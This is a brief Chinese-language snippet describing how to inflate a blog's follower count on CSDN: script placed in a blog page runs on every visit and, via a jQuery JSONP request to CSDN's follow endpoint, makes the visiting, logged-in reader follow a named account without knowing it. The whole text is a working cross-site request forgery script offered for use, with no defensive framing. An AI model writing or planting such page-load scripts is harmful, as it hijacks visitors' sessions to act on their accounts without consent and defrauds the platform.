原理是当有访客访问博客时,执行js实现自动加粉丝,达到刷粉的目的。
<script src="http://code.jquery.com/jquery-1.4.1.min.js" type="text/javascript"></script>
<script type="text/javascript">
$(function(){
$.ajax({
type: "get",
url: "http://my.csdn.net/index.php/follow/do_follow?username=guwei4037",
dataType:"jsonp",
success: function(data){
alert(data);
}
});
});
</script>